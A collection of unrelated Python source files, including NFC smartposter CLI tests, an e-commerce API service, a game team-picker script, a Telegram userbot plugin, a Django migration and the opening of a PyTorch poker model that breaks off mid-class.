result = runner.invoke(main, params)
assert result.exit_code == 0
assert result.stdout_bytes == \
b'\xd1\x02\x1aSp\x91\x01\nU\x03nfcpy.orgQ\x01\x08T\x02enTitle'
def test_smartposter_with_german_title(runner):
params = 'smartposter -t de Titel http://nfcpy.org'.split()
result = runner.invoke(main, params)
assert result.exit_code == 0
assert result.stdout_bytes == \
b'\xd1\x02\x1aSp\x91\x01\nU\x03nfcpy.orgQ\x01\x08T\x02deTitel'
def test_smartposter_with_two_titles(runner):
params = 'smartposter -T Title -t de Titel http://nfcpy.org'.split()
result = runner.invoke(main, params)
assert result.exit_code == 0
assert result.stdout_bytes == \
b'\xd1\x02&Sp\x91\x01\nU\x03nfcpy.org' \
b'\x11\x01\x08T\x02deTitelQ\x01\x08T\x02enTitle'
def test_smartposter_with_action_exec(runner):
params = 'smartposter -a exec http://nfcpy.org'.split()
result = runner.invoke(main, params)
assert result.exit_code == 0
assert result.stdout_bytes == \
b'\xd1\x02\x15Sp\x91\x01\nU\x03nfcpy.orgQ\x03\x01act\x00'
def test_smartposter_with_png_icon(isolated_runner):
icon_1x1_png_data = bytearray.fromhex(
'89504e470d0a1a0a0000000d494844520000000100000001080200000090'
'7753de0000000c4944415408d763f8ffff3f0005fe02fedccc59e7000000'
'0049454e44ae426082')
open('1x1.png', 'wb').write(icon_1x1_png_data)
params = 'smartposter -i 1x1.png http://nfcpy.org'.split()
result = isolated_runner.invoke(main, params)
assert result.exit_code == 0
assert result.stdout_bytes == (
b'\xd1\x02_Sp\x91\x01\nU\x03nfcpy.orgR\tEimage/png\x89PNG\r\n\x1a\n'
b'\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x02\x00\x00'
b'\x00\x90wS\xde\x00\x00\x00\x0cIDAT\x08\xd7c\xf8\xff\xff?\x00\x05'
b'\xfe\x02\xfe\xdc\xccY\xe7\x00\x00\x00\x00IEND\xaeB`\x82')
def test_smartposter_with_invalid_icon(isolated_runner):
open('1x1.png', 'w').write('this is not a png file')
params = 'smartposter -i 1x1.png http://nfcpy.org'.split()
result = isolated_runner.invoke(main, params)
assert result.exit_code == 1
assert "Error:" in result.output
|
import typing
from typing import Optional
from uuid import UUID
from marshmallow import Schema, fields, post_dump
from commercetools import helpers, schemas, types
from commercetools.services import abstract
from commercetools.typing import OptionalListInt, OptionalListStr, OptionalListUUID
__all__ = ["ProductProjectionService"]
class ProductProjectionsBaseSchema(abstract.AbstractQuerySchema):
staged = fields.Bool(data_key="staged", required=False, missing=False)
price_currency = fields.String(data_key="priceCurrency")
price_country = fields.String(data_key="priceCountry")
price_customer_group = fields.UUID(data_key="priceCustomerGroup")
price_channel = fields.UUID(data_key="priceChannel")
class ProductProjectionsQuerySchema(ProductProjectionsBaseSchema):
pass
class ProductProjectionsSearchSchema(ProductProjectionsBaseSchema):
text = fields.Method("text_serialize")
fuzzy = fields.Bool()
fuzzy_level = fields.Integer(data_key="fuzzy.level")
filter = helpers.OptionalList(fields.String())
filter_query = helpers.OptionalList(fields.String(), data_key="filter.query")
filter_facets = helpers.OptionalList(fields.String(), data_key="filter.facets")
facet = helpers.OptionalList(fields.String())
mark_matching_variants = fields.Bool(data_key="markMatchingVariants")
def text_serialize(self, value):
result = {}
data = value.get("text") or {}
for k, v in data.items():
result[f"text.{k}"] = v
return result
@post_dump
def merge_text(self, data):
value = data.pop("text")
data.update(value)
return data
class ProductProjectionService(abstract.AbstractService):
def get_by_id(
self,
id: str,
staged: bool = False,
price_currency: str = None,
price_country: str = None,
price_customer_group: UUID = None,
price_channel: UUID = None,
expand: OptionalListStr = None,
) -> Optional[types.ProductProjection]:
params = {
"staged": staged,
"price_currency": price_currency,
"price_country": price_country,
"price_customer_group": price_customer_group,
"price_channel": price_channel,
"expand": expand,
}
query_params = ProductProjectionsBaseSchema().dump(params)
return self._client._get(
f"product-projections/{id}", query_params, schemas.ProductProjectionSchema
)
def get_by_key(
self,
key: str,
staged: bool = False,
price_currency: OptionalListStr = None,
price_country: OptionalListStr = None,
price_customer_group: typing.Optional[UUID] = None,
price_channel: typing.Optional[UUID] = None,
expand: OptionalListStr = None,
) -> types.ProductProjection:
params = {
"staged": staged,
"price_currency": price_currency,
"price_country": price_country,
"price_customer_group": price_customer_group,
"price_channel": price_channel,
"expand": expand,
}
query_params = ProductProjectionsBaseSchema().dump(params)
return self._client._get(
f"product-projections/key={key}", query_params, schemas.ProductProjectionSchema
)
def query(
self,
where: OptionalListStr = None,
sort: OptionalListStr = None,
expand: OptionalListStr = None,
limit: OptionalListInt = None,
offset: OptionalListInt = None,
staged: bool = False,
price_currency: OptionalListStr = None,
price_country: OptionalListStr = None,
price_customer_group: OptionalListUUID = None,
price_channel: OptionalListUUID = None,
) -> types.ProductProjectionPagedQueryResponse:
params = ProductProjectionsQuerySchema().dump(
{
"where": where,
"sort": sort,
"expand": expand,
"limit": limit,
"offset": offset,
"staged": staged,
"price_currency": price_currency,
"price_country": price_country,
"price_customer_group": price_customer_group,
"price_channel": price_channel,
}
)
return self._client._get(
"product-projections",
params,
schemas.ProductProjectionPagedQueryResponseSchema,
)
def search(
self,
text: typing.Optional[typing.Dict[str, str]] = None,
fuzzy: typing.Optional[bool] = None,
fuzzy_level: typing.Optional[int] = None,
filter: OptionalListStr = None,
filter_query: OptionalListStr = None,
filter_facets: OptionalListStr = None,
facet: OptionalListStr = None,
sort: OptionalListStr = None,
limit: OptionalListInt = None,
offset: OptionalListInt = None,
staged: bool = False,
mark_matching_variants: bool = False,
price_currency: OptionalListStr = None,
price_country: OptionalListStr = None,
price_customer_group: OptionalListUUID = None,
price_channel: OptionalListUUID = None,
expand: OptionalListStr = None,
) -> types.ProductProjectionPagedSearchResponse:
params = {
"text": text,
"fuzzy": fuzzy,
"fuzzy_level": fuzzy_level,
"filter": filter,
"filter_query": filter_query,
"filter_facets": filter_facets,
"facet": facet,
"sort": sort,
"limit": limit,
"offset": offset,
"staged": staged,
"mark_matching_variants": mark_matching_variants,
"price_currency": price_currency,
"price_country": price_country,
"price_customer_group": price_customer_group,
"price_channel": price_channel,
"expand": expand,
}
return self._client._post(
"product-projections/search",
{},
params,
ProductProjectionsSearchSchema,
response_schema_cls=schemas.ProductProjectionPagedSearchResponseSchema,
form_encoded=True,
)
|
# More info on these dicts in team_picker_setup.py
dict = {1: {'exile': ['yasuo'], 'robot': ['blitzcrank']}, 2: {'dragon': ['aurelionsol', 'shyvana'], 'phantom': ['karthus', 'kindred', 'mordekaiser'], 'guardian': ['braum', 'leona']}, 3: {'pirate': ['gangplank', 'graves', 'missfortune', 'pyke', 'twistedfate'], 'void': ['chogath', 'kassadin', 'khazix', 'reksai'], 'elementalist': ['anivia', 'brand', 'kennen', 'lissandra'], 'shapeshifter': ['elise', 'gnar', 'nidalee', 'shyvana', 'swain']}, 4: {'imperial': ['darius', 'draven', 'katarina', 'swain'], 'ninja': ['akali', 'kennen', 'shen', 'zed'], 'wild': ['ahri', 'gnar', 'nidalee', 'rengar', 'warwick'], 'brawler': ['blitzcrank', 'chogath', 'reksai', 'volibear', 'warwick'], 'gunslinger': ['gangplank', 'graves', 'lucian', 'missfortune', 'tristana'], 'ranger': ['ashe', 'kindred', 'varus', 'vayne']}, 6: {'demon': ['aatrox', 'brand', 'elise', 'evelynn', 'morgana', 'swain', 'varus'], 'glacial': ['anivia', 'ashe', 'braum', 'lissandra', 'sejuani', 'volibear'], 'noble': ['fiora', 'garen', 'kayle', 'leona', 'lucian', 'vayne'], 'yordle': ['gnar', 'kennen', 'lulu', 'poppy', 'tristana', 'veigar'], 'assassin': ['akali', 'evelynn', 'katarina', 'khazix', 'pyke', 'rengar', 'zed'], 'blademaster': ['aatrox', 'draven', 'fiora', 'gangplank', 'shen', 'yasuo'], 'knight': ['darius', 'garen', 'kayle', 'mordekaiser', 'poppy', 'sejuani'], 'sorcerer': ['ahri', 'aurelionsol', 'karthus', 'kassadin', 'lulu', 'morgana', 'twistedfate', 'veigar']}}
champ_dict = {'aatrox': ['demon', 'blademaster'], 'ahri': ['wild', 'sorcerer'], 'akali': ['ninja', 'assassin'], 'anivia': ['glacial', 'elementalist'], 'ashe': ['glacial', 'ranger'], 'aurelionsol': ['dragon', 'sorcerer'], 'blitzcrank': ['robot', 'brawler'], 'brand': ['demon', 'elementalist'], 'braum': ['glacial', 'guardian'], 'chogath': ['void', 'brawler'], 'darius': ['imperial', 'knight'], 'draven': ['imperial', 'blademaster'], 'elise': ['demon', 'shapeshifter'], 'evelynn': ['demon', 'assassin'], 'fiora': ['noble', 'blademaster'], 'gangplank': ['pirate', 'gunslinger', 'blademaster'], 'garen': ['noble', 'knight'], 'gnar': ['wild', 'yordle', 'shapeshifter'], 'graves': ['pirate', 'gunslinger'], 'karthus': ['phantom', 'sorcerer'], 'kassadin': ['void', 'sorcerer'], 'katarina': ['imperial', 'assassin'], 'kayle': ['noble', 'knight'], 'kennen': ['ninja', 'yordle', 'elementalist'], 'khazix': ['void', 'assassin'], 'kindred': ['phantom', 'ranger'], 'leona': ['noble', 'guardian'], 'lissandra': ['glacial', 'elementalist'], 'lucian': ['noble', 'gunslinger'], 'lulu': ['yordle', 'sorcerer'], 'missfortune': ['pirate', 'gunslinger'], 'mordekaiser': ['phantom', 'knight'], 'morgana': ['demon', 'sorcerer'], 'nidalee': ['wild', 'shapeshifter'], 'poppy': ['yordle', 'knight'], 'pyke': ['pirate', 'assassin'], 'reksai': ['void', 'brawler'], 'rengar': ['wild', 'assassin'], 'sejuani': ['glacial', 'knight'], 'shen': ['ninja', 'blademaster'], 'shyvana': ['dragon', 'shapeshifter'], 'swain': ['imperial', 'demon', 'shapeshifter'], 'tristana': ['yordle', 'gunslinger'], 'twistedfate': ['pirate', 'sorcerer'], 'varus': ['demon', 'ranger'], 'vayne': ['noble', 'ranger'], 'veigar': ['yordle', 'sorcerer'], 'volibear': ['glacial', 'brawler'], 'warwick': ['wild', 'brawler'], 'yasuo': ['exile', 'blademaster'], 'zed': ['ninja', 'assassin']}
class_dict = {'demon': ['aatrox', 'brand', 'elise', 'evelynn', 'morgana', 'swain', 'varus'], 'dragon': ['aurelionsol', 'shyvana'], 'exile': ['yasuo'], 'glacial': ['anivia', 'ashe', 'braum', 'lissandra', 'sejuani', 'volibear'], 'imperial': ['darius', 'draven', 'katarina', 'swain'], 'noble': ['fiora', 'garen', 'kayle', 'leona', 'lucian', 'vayne'], 'ninja': ['akali', 'kennen', 'shen', 'zed'], 'pirate': ['gangplank', 'graves', 'missfortune', 'pyke', 'twistedfate'], 'phantom': ['karthus', 'kindred', 'mordekaiser'], 'robot': ['blitzcrank'], 'void': ['chogath', 'kassadin', 'khazix', 'reksai'], 'wild': ['ahri', 'gnar', 'nidalee', 'rengar', 'warwick'], 'yordle': ['gnar', 'kennen', 'lulu', 'poppy', 'tristana', 'veigar'], 'assassin': ['akali', 'evelynn', 'katarina', 'khazix', 'pyke', 'rengar', 'zed'], 'blademaster': ['aatrox', 'draven', 'fiora', 'gangplank', 'shen', 'yasuo'], 'brawler': ['blitzcrank', 'chogath', 'reksai', 'volibear', 'warwick'], 'elementalist': ['anivia', 'brand', 'kennen', 'lissandra'], 'guardian': ['braum', 'leona'], 'gunslinger': ['gangplank', 'graves', 'lucian', 'missfortune', 'tristana'], 'knight': ['darius', 'garen', 'kayle', 'mordekaiser', 'poppy', 'sejuani'], 'ranger': ['ashe', 'kindred', 'varus', 'vayne'], 'shapeshifter': ['elise', 'gnar', 'nidalee', 'shyvana', 'swain'], 'sorcerer': ['ahri', 'aurelionsol', 'karthus', 'kassadin', 'lulu', 'morgana', 'twistedfate', 'veigar']}
class_bonus_dict = {'demon': 6, 'dragon': 2, 'exile': 1, 'glacial': 6, 'imperial': 4, 'noble': 6, 'ninja': 4, 'pirate': 3, 'phantom': 2, 'robot': 1, 'void': 3, 'wild': 4, 'yordle': 6, 'assassin': 6, 'blademaster': 6, 'brawler': 4, 'elementalist': 3, 'guardian': 2, 'gunslinger': 4, 'knight': 6, 'ranger': 4, 'shapeshifter': 3, 'sorcerer': 6}
def help_me(first):
"""
Given the first champion, output who I should build.
Runtime:
"""
# first = input("Name of your first chamption: ").lower()
perfect_team = {}
team = [first]
classes = champ_dict[first]
remaining_slots = 8
remaining_for_bonus = class_bonus_dict[classes[0]] - 1
print(remaining_for_bonus, "more for ", classes[0], " bonus")
current_class = classes[0]
perfect_team.update({current_class: [first]})
for i in range(remaining_for_bonus): # Loop for each remaining slot for the bonus.
new_champ = None
# If the character is not already inside the perfect team, add it within the correct class.
if class_dict[current_class][i] not in perfect_team[current_class]:
# Adding the new character to the perfect team
new_champ = class_dict[current_class][i]
perfect_team[current_class] += [new_champ]
team.append(new_champ)
else:
# Adding the new character to the perfect team
new_champ = class_dict[current_class][i+1]
perfect_team[current_class] += [new_champ]
team.append(new_champ)
for c in champ_dict[new_champ]:
if c not in classes:
classes.append(c)
remaining_slots -= 1
# Working this far.
# TODO: Build the rest of the team. Figure out what the next class should be.
if remaining_slots == 5: # There is no bonus with exaclty 5 characters.
# Do 2 more classes.
print("NO CLASS WITH 5")
pass
else:
options_for_next_class = dict[remaining_slots] # All classes that need all the current remaining slots.
next_class = None # Class that is already present in list and is an option in the list above.
for c in classes: # Finding a match
if c in options_for_next_class.keys():
next_class = c
break
if next_class == None: # No matches
# TODO: Pick at random.
print("NO MATCHES FOUND")
# print("Next Class: ", next_class)
slots_for_next = 0
options_for_next_champ = list(set(class_dict[next_class]) - set(team))
# print("Options for {} class: {}".format(next_class, options_for_next_champ))
perfect_team.update({next_class : []})
for count in range(remaining_slots):
new_class_champ = options_for_next_champ[count]
perfect_team[next_class].append(new_class_champ)
remaining_slots -= 1
team.append(new_class_champ)
for c in champ_dict[new_class_champ]:
if c not in classes:
classes.append(c)
print("Perfect Team:",perfect_team)
print("Team:",team)
print("Classes:", classes)
print("Remaining Slots:", remaining_slots)
help_me('kennen')
|
import requests
PO_TOKEN = "ajnub*********74xi8gifnp6r"
PO_USER = "u1dj************n81x6vr7vx"
def send_push_notify(text):
if PO_USER == "yourpushoveruser" or PO_USER is None:
print("No notifications since po is not setup")
return
try:
r = requests.post("https://api.pushover.net/1/messages.json", data={
"token": PO_TOKEN,
"user": PO_USER,
"message": text
})
except Exception as err:
print(f"Failed in pinging push notifications {err}")
|
class Solution:
def divisorGame(self, N: int) -> bool:
return not (N & 1)
|
#!/usr/bin/env python
import os
import sys
import pyami.resultcache
import pyami.fileutil
import cachefs
import threading
debug = True
def debug(s):
if debug:
sys.stderr.write(s)
sys.stderr.write('\n')
class Cache(pyami.resultcache.ResultCache):
def __init__(self, disk_cache_path, disk_cache_size, *args, **kwargs):
self.diskcache = cachefs.CacheFS(disk_cache_path, disk_cache_size)
pyami.resultcache.ResultCache.__init__(self, *args, **kwargs)
self.lock = threading.Lock()
def check_disable(self, pipeline):
for pipe in pipeline:
if pipe.disable_cache:
return True
return False
def _put(self, pipeline, result):
if self.check_disable(pipeline):
return
pyami.resultcache.ResultCache.put(self, pipeline, result)
if pipeline[-1].cache_file:
self.file_put(pipeline, result)
def put(self, pipeline, result):
self.lock.acquire()
try:
return self._put(pipeline, result)
finally:
self.lock.release()
def _get(self, pipeline):
if self.check_disable(pipeline):
return
## try memory cache
result = pyami.resultcache.ResultCache.get(self, pipeline)
if result is None:
debug('NOT IN MEMORY: %s' %(pipeline[-1],))
## try disk cache
result = self.file_get(pipeline)
if result is not None:
debug('IN FILE: %s' %(pipeline[-1],))
pyami.resultcache.ResultCache.put(self, pipeline, result)
else:
debug('IN MEMORY: %s' % (pipeline[-1],))
## found in memory cache, but need to touch or rewrite disk cache
if not self.file_touch(pipeline):
debug('NOT IN FILE: %s' % (pipeline[-1],))
self.file_put(pipeline, result)
return result
def get(self, pipeline):
self.lock.acquire()
try:
return self._get(pipeline)
finally:
self.lock.release()
def file_put(self, pipeline, result, permanent=False):
final_pipe = pipeline[-1]
# some pipes specify not to be cached to disk
if not final_pipe.cache_file:
return
resultfilename = self.result_filename(pipeline)
path = os.path.dirname(resultfilename)
self.diskcache.makedir(path, recursive=True, allow_recreate=True)
f = self.diskcache.open(resultfilename, 'wb')
final_pipe.put_result(f, result)
f.close()
def file_get(self, pipeline):
resultfilename = self.result_filename(pipeline)
try:
f = self.diskcache.open(resultfilename, 'rb')
except:
return None
result = pipeline[-1].get_result(f)
f.close()
return result
def file_touch(self, pipeline):
resultfilename = self.result_filename(pipeline)
exists = self.diskcache.exists(resultfilename)
if exists:
self.diskcache.settimes(resultfilename)
return exists
def result_filename(self, pipeline):
pipeline_path = self.pipeline_path(pipeline)
resultname = pipeline[-1].resultname()
path = os.path.join(os.sep, pipeline_path, resultname)
return path
def pipeline_path(self, pipeline):
parts = [pipe.dirname() for pipe in pipeline]
parts = filter(None, parts)
path = os.path.join(*parts)
return path
if __name__ == '__main__':
test_disk_cache_manager()
|
# Generated by Django 2.2 on 2020-03-31 19:41
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import sorl.thumbnail.fields
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("posts", "0003_post_image"),
]
operations = [
migrations.AlterField(
model_name="post",
name="image",
field=sorl.thumbnail.fields.ImageField(
blank=True, null=True, upload_to="posts/"
),
),
migrations.CreateModel(
name="Comment",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("text", models.TextField()),
(
"created",
models.DateTimeField(
auto_now_add=True, verbose_name="date created"
),
),
(
"author",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="comments",
to=settings.AUTH_USER_MODEL,
),
),
(
"post",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="comments",
to="posts.Post",
),
),
],
),
]
|
### DO NOT REMOVE THIS
from typing import List
### DO NOT REMOVE THIS
class Solution:
def divide(self, dividend: int, divisor: int) -> int:
if dividend==-2147483648 and divisor==-1:
return 2147483647
if dividend/divisor<0:
return dividend//divisor if dividend%divisor==0 else dividend//divisor +1
else:
return dividend//divisor
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
from vector import vector, plot_peaks
from oct2py import octave
# Load the Octage-Forge signal package.
octave.eval("pkg load signal")
print('Detect peaks without any filters.')
(_, indexes) = octave.findpeaks(np.array(vector), 'DoubleSided',
'MinPeakHeight', 0, 'MinPeakDistance', 0, 'MinPeakWidth', 0)
# The results are in a 2D array and in floats: get back to 1D array and convert
# peak indexes to integer. Also this is MatLab-style indexation (one-based),
# so we must substract one to get back to Python indexation (zero-based).
indexes = indexes[0].astype(int) - 1
print('Peaks are: %s' % (indexes))
plot_peaks(np.array(vector), indexes,
algorithm='Octave-Forge findpeaks')
print('Detect peaks with minimum height and distance filters.')
(pks, indexes) = octave.findpeaks(np.array(vector), 'DoubleSided',
'MinPeakHeight', 6, 'MinPeakDistance', 2, 'MinPeakWidth', 0)
# The results are in a 2D array and in floats: get back to 1D array and convert
# peak indexes to integer. Also this is MatLab-style indexation (one-based),
# so we must substract one to get back to Python indexation (zero-based).
indexes = indexes[0].astype(int) - 1
print('Peaks are: %s' % (indexes))
plot_peaks(np.array(vector), indexes, mph=6, mpd=2,
algorithm='Octave-Forge findpeaks')
|
"""Tests."""
import pytest
from part1 import TLSTester
from part2 import SSLTester
class TestPart1UnitTests:
"""."""
@pytest.mark.parametrize("test_input, expected", [
("abba", True),
("abcd", False),
("aaaa", False),
("ioxxoj", True)
])
def test_contains_abba(self, test_input, expected):
"""."""
tls_tester = TLSTester()
assert(tls_tester.contains_abba(test_input) == expected)
@pytest.mark.parametrize("test_input, expected", [
(["abba", "mnop", "qrst"], True),
(["abcd", "bdbd", "xyxy"], False),
(["aaaa", "qwer", "tyui"], False),
(["ioxxoj", "asdfgh", "zxcvbn"], True)
])
def test_batch_contains_abba(self, test_input, expected):
"""."""
tls_tester = TLSTester()
assert(tls_tester.batch_contains_abba(test_input) == expected)
@pytest.mark.parametrize("test_input, expected", [
("abba[mnop]qrst", True),
("abcd[bddb]xyyx", False),
("aaaa[qwer]tyui", False),
("ioxxoj[asdfgh]zxcvbn", True)
])
def test_ip_supports_tls(self, test_input, expected):
"""."""
tls_tester = TLSTester()
assert(tls_tester.ip_supports_tls(test_input) == expected)
def test_count_supported_ips(self):
"""."""
test_input = [
"abba[mnop]qrst",
"abcd[bddb]xyyx",
"aaaa[qwer]tyui",
"ioxxoj[asdfgh]zxcvbn",
]
expected = 2
tls_tester = TLSTester(test_input)
assert(tls_tester.count_supported_ips() == expected)
class TestPart2UnitTests:
"""."""
@pytest.mark.parametrize("test_input, expected", [
('aba', ['aba']),
('asdfdsa', ['dfd']),
('asdsdf', ['sds', 'dsd']),
('asdf', []),
('asdfffdsa', [])
])
def test_find_aba(self, test_input, expected):
"""."""
ssl_tester = SSLTester()
assert(ssl_tester.find_aba(test_input) == expected)
@pytest.mark.parametrize("test_input, expected", [
([], []),
(['asdfdgh'], ['dfd']),
(['asdsf', 'asdfd'], ['sds', 'dfd']),
(['asds', 'asdfdfg'], ['sds', 'dfd', 'fdf'])
])
def test_batch_find_aba(self, test_input, expected):
"""."""
ssl_tester = SSLTester()
assert(ssl_tester.batch_find_aba(test_input) == expected)
@pytest.mark.parametrize("test_key, test_seq, expected", [
('aba', ['bab'], True),
('aba', ['aba', 'asdffssdsds', 'asdfs'], False),
('bab', ['suuebb', 'aeth', 'aaabaa'], True)
])
def test_has_corresponding_bab(self, test_key, test_seq, expected):
"""."""
ssl_tester = SSLTester()
assert(ssl_tester.has_corresponding_bab(test_key, test_seq) == expected)
@pytest.mark.parametrize("test_input, expected", [
('aba[bab]xyz', True),
('xyx[xyx]xyx', False),
('aaa[kek]eke', True),
('zazbz[bzb]cdb', True)
])
def test_ip_supports_ssl(self, test_input, expected):
"""."""
ssl_tester = SSLTester()
assert(ssl_tester.ip_supports_ssl(test_input) == expected)
def test_count_supported_ips(self):
"""."""
test_input = [
'aba[bab]xyz',
'xyx[xyx]xyx',
'aaa[kek]eke',
'zazbz[bzb]cdb'
]
expected = 3
ssl_tester = SSLTester()
assert(ssl_tester.count_supported_ips(test_input) == expected)
|
# Copyright (C) 2020-2021 by TeamSpeedo@Github, < https://github.com/TeamSpeedo >.
#
# This file is part of < https://github.com/TeamSpeedo/FridayUserBot > project,
# and is released under the "GNU v3.0 License Agreement".
# Please see < https://github.com/TeamSpeedo/blob/master/LICENSE >
#
# All rights reserved.
from pyrogram import filters
from database.welcomedb import add_welcome, del_welcome, welcome_info
from main_start.config_var import Config
from main_start.core.decorators import speedo_on_cmd, listen
from main_start.helper_func.basic_helpers import edit_or_reply
@speedo_on_cmd(
["savewelcome"],
cmd_help={
"help": "Save Welcome Message!",
"example": "{ch}savewelcome (reply to welcome message)",
},
)
async def save_welcome(client, message):
engine = message.Engine
note_ = await edit_or_reply(message, engine.get_string("PROCESSING"))
if not message.reply_to_message:
await note_.edit(engine.get_string("REPLY_TO_WELCOME"))
return
msg = message.reply_to_message
cool = await msg.copy(int(Config.LOG_GRP))
await add_welcome(int(message.chat.id), cool.message_id)
await note_.edit(engine.get_string("WELCOME_SAVED"))
@listen(filters.new_chat_members & filters.group)
async def welcomenibba(client, message):
engine = message.Engine
if not message:
return
if not await welcome_info(int(message.chat.id)):
return
if not message.chat:
return
is_m = False
sed = await welcome_info(int(message.chat.id))
m_s = await client.get_messages(int(Config.LOG_GRP), sed["msg_id"])
if await is_media(m_s):
text_ = m_s.caption or ""
is_m = True
else:
text_ = m_s.text or ""
if text_ != "":
mention = message.new_chat_members[0].mention
user_id = message.new_chat_members[0].id
user_name = message.new_chat_members[0].username or "No Username"
first_name = message.new_chat_members[0].first_name
last_name = message.new_chat_members[0].last_name or "No Last Name"
text_ = text_.format(mention=mention, user_id=user_id, user_name=user_name, first_name=first_name, last_name=last_name)
if not is_m:
await client.send_message(
message.chat.id,
text_,
reply_to_message_id=message.message_id)
else:
await m_s.copy(
chat_id=int(message.chat.id),
caption=text_,
reply_to_message_id=message.message_id,
)
async def is_media(message):
return bool(
(
message.photo
or message.video
or message.document
or message.audio
or message.sticker
or message.animation
or message.voice
or message.video_note
)
)
@speedo_on_cmd(
["delwelcome"],
cmd_help={"help": "Delete welcome Message!", "example": "{ch}delwelcome"},
)
async def del_welcomez(client, message):
engine = message.Engine
note_ = await edit_or_reply(message, engine.get_string("PROCESSING"))
if not await welcome_info(int(message.chat.id)):
await note_.edit(engine.get_string("FILTER_3").format("Welcome Message"))
return
await del_welcome(int(message.chat.id))
await note_.edit(engine.get_string("FILTER_2").format("Welcome", "Message"))
@speedo_on_cmd(
["welcome"],
cmd_help={"help": "Current Welcome Message!", "example": "{ch}welcome"},
)
async def show_welcome(client, message):
engine = message.Engine
pablo = await edit_or_reply(message, engine.get_string("PROCESSING"))
sed = await welcome_info(int(message.chat.id))
if sed is False:
await pablo.edit(engine.get_string("FILTER_3").format("Welcome Message"))
return
mag = f""" Welcome Message In Correct Chat Is :"""
await client.copy_message(
from_chat_id=int(Config.LOG_GRP),
chat_id=int(message.chat.id),
message_id=sed["msg_id"],
reply_to_message_id=message.message_id,
)
await pablo.edit(mag)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from poker_env.datatypes import Globals,SUITS,RANKS,Action,Street,NetworkActions
import numpy as np
from models.model_utils import strip_padding,unspool,hardcode_handstrength
import time
from functools import lru_cache
class IdentityBlock(nn.Module):
def __init__(self,hidden_dims,activation):
"""hidden_dims must contain 3 values"""
super().__init__()
assert len(hidden_dims) == 3
self.activation = activation
self.fc1 = nn.Linear(hidden_dims[0],hidden_dims[1])
self.fc2 = nn.Linear(hidden_dims[1],hidden_dims[2])
def forward(self,x):
out = self.activation(self.fc1(x)) + x
out2 = self.activation(self.fc2(out))
return out2
class NetworkFunctions(object):
def __init__(self,nA,nB):
self.nA = nA
self.nB = nB
self.nC = nA - 2 + self.nB
def wrap_action(self,action,betsize_category,previous_action):
"""
Wraps split action/betsize into flat action.
Bets and raises are combined into one.
"""
actions = torch.zeros(self.nC)
if action < 3:
actions[action] = 1
else: # Bet or raise
actions[betsize_category + 3] = 1
return torch.argmax(actions, dim=0).unsqueeze(0)
@lru_cache(maxsize=30)
def batch_unwrap_action(self,actions:torch.Tensor,previous_actions:torch.Tensor):
"""
Unwraps flat action into action_category and betsize_category
Action is from network outputs - 0-5
previous_action is from env. 1-6
"""
int_actions = torch.zeros_like(actions)
int_betsizes = torch.zeros_like(actions)
prev_ge_2 = torch.as_tensor((previous_actions > Action.FOLD)&(previous_actions < Action.UNOPENED))
prev_le_3 = torch.as_tensor((previous_actions < Action.CALL)|(previous_actions == Action.UNOPENED))
actions_le_2 = actions < 2
actions_ge_2 = actions > 2
actions_le_3 = actions < 3
int_actions[actions_le_2] = actions[actions_le_2]
int_betsizes[actions_le_2] = 0
int_betsizes[actions_ge_2] = actions[actions_ge_2] - 3
int_actions[(actions_ge_2)&(prev_ge_2)] = 4
int_actions[(actions_ge_2)&(prev_le_3)] = 3
int_actions[actions_le_3] = actions[actions_le_3]
return int_actions,int_betsizes
@lru_cache(maxsize=30)
def unwrap_action(self,action:torch.Tensor,previous_action:torch.Tensor):
"""
Unwraps flat action into action_category and betsize_category
Action is from network outputs - 0-5
previous_action is from env. 1-6
"""
actions = torch.zeros(self.nA)
betsizes = torch.zeros(self.nB)
# actions[action[action < 3]] = 1
if action < NetworkActions.BET:
actions[action] = 1
elif previous_action == Action.UNOPENED or previous_action == Action.CHECK: # Unopened
actions[3] = 1
bet_category = action - 3
betsizes[bet_category] = 1
else: # facing bet or raise or call (preflop)
actions[4] = 1
bet_category = action - 3
betsizes[bet_category] = 1
int_actions = torch.argmax(actions, dim=0).unsqueeze(-1)
int_betsizes = torch.argmax(betsizes, dim=0).unsqueeze(-1)
return int_actions,int_betsizes
# def unwrap_action(self,action:torch.Tensor,previous_action:torch.Tensor):
# """Unwraps flat action into action_category and betsize_category"""
# actions_output = torch.zeros(action.size(0),self.nA)
# betsizes = torch.zeros(action.size(0),self.nB)
# # actions[action[action < 3]] = 1
# # for i,action in enumerate(actions):
# if action < 3:
# actions_output[:,action] = 1
# elif previous_action == 5 or previous_action == 0: # Unopened
# actions_output[:,3] = 1
# bet_category = action - 3
# betsizes[:,bet_category] = 1
# else: # facing bet or raise
# actions_output[:,4] = 1
# bet_category = action - 3
# betsizes[:,bet_category] = 1
# int_actions = torch.argmax(actions_output, dim=-1)
# int_betsizes = torch.argmax(betsizes, dim=-1)
# return int_actions,int_betsizes
################################################
# Processing Layers #
################################################
class ProcessHandBoard(nn.Module):
def __init__(self,params,hand_length,hidden_dims=(16,32,32),output_dims=(15360,512,256,127),activation_fc=F.relu):
super().__init__()
self.output_dims = output_dims
self.activation_fc = activation_fc
self.hidden_dims = hidden_dims
self.hand_length = hand_length
self.one_hot_suits = torch.nn.functional.one_hot(torch.arange(0,SUITS.HIGH))
self.one_hot_ranks = torch.nn.functional.one_hot(torch.arange(0,RANKS.HIGH))
self.maxlen = params['maxlen']
self.device = params['device']
# Input is (b,4,2) -> (b,4,4) and (b,4,13)
self.suit_conv = nn.Sequential(
nn.Conv1d(5, 16, kernel_size=1, stride=1),
nn.BatchNorm1d(16),
nn.ReLU(inplace=True),
)
self.rank_conv = nn.Sequential(
nn.Conv1d(5, 16, kernel_size=5, stride=1),
nn.BatchNorm1d(16),
nn.ReLU(inplace=True),
)
self.hidden_layers = nn.ModuleList()
for i in range(len(self.hidden_dims)-1):
self.hidden_layers.append(nn.Linear(self.hidden_dims[i],self.hidden_dims[i+1]))
self.categorical_output = nn.Linear(512,7463)
self.output_layers = nn.ModuleList()
for i in range(len(self.output_dims)-1):
